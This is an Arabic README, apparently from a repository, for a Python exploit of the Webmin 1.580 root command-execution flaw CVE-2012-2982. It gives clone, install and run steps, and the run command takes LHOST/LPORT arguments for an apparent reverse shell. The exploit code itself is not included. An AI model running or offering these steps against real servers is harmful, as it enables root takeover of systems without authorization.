
استغلال بايثون لـ CVE-2012-2982
تم كتابة هذا السكربت بلغة بايثون للثغرة في Webmin 1.580، CVE-2012-2982. توجد الثغرة في المكون /file/show.cgi وتسمح لمستخدم موثق، لديه صلاحية الوصول إلى وحدة مدير الملفات، بتنفيذ أوامر عشوائية بصلاحيات الجذر.
إصدار بايثون المختبر: Python 3.8.5
الحزمة المطلوبة من pip: secrets
git clone https://github.com/OstojaOfficial/CVE-2012-2982.git
pip3 install -r requirements.txt
لتشغيل الاستغلال، استخدم الأمر التالي:
python3 exploit.py <IP> <Username> <Password> <LHOST> <LPORT>